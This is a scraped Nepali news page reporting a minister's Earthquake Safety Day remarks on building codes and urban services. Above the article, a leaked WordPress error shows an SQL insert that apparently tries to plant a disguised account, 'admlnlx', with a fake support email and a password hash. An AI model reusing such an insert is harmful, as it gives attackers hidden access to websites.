WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Boxhm6rh8vFAUSQBE/fmTqP3XeLpw71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:59:43', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नगरका जनतालाई सुविधा दिन आग्रह – Gaule Khabar

नगरका जनतालाई सुविधा दिन आग्रह

नगरका जनतालाई सुविधा दिन आग्रह

विराटनगर, माघ २ –

सहरी विकासमन्त्री अर्जुननरसिंह केसीले भवन आचारसंहिताको पालना गरी भूकम्प प्रतिरोधात्मक घर बनाउन जोड दिनुभएको छ ।

उन्नाइसौँ भूकम्प सुरक्षा दिवसका अवसरमा यहाँ आज जिल्ला देवीप्रकोप उद्धार समितिद्वारा आयोजित कार्यक्रममा उहाँले भवन आचारसंहिताको सम्बन्धमा सर्वसाधारणमा जनचेतना फैलाउनुपर्ने औंल्याउनुभयो ।

उहाँले सहरी विकास मन्त्रालयद्वारा गठित उच्चस्तरीय निर्देशन समितिले भवन निर्माणका साथै आधुनिक सहर बनाउनका लागि बाटो, शुद्ध खानेपानी, बिजुली, टेलिफोन र फोहोर व्यवस्थापनको समेत व्यवस्था मिलाउने किसिमको काम गर्नुपर्ने निर्देशन जारी गरेको जानकारी गराउनुभयो ।

मन्त्री केसीले पाँच वर्षअघि १९ प्रतिशत जनता नगरमा बसोवास गरेकामा यतिखेर ४२ प्रतिशतमा पुगे पनि नगरका जनताले तिरेको करको अनुपातमा सुविधा नपाइरहेको तर्फ ध्यानकेन्द्रित गर्नुपर्ने विषय उल्लेख गर्नुभयो ।

यसअघि सो दिवसका अवसरमा विराटनगर उपमहानगरपालिकाको परिसरबाट सुरु भएको प्रभातफेरी जिल्ला प्रशासन कार्यालयको परिसर पुगेर सम्पन्न भएको थियो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका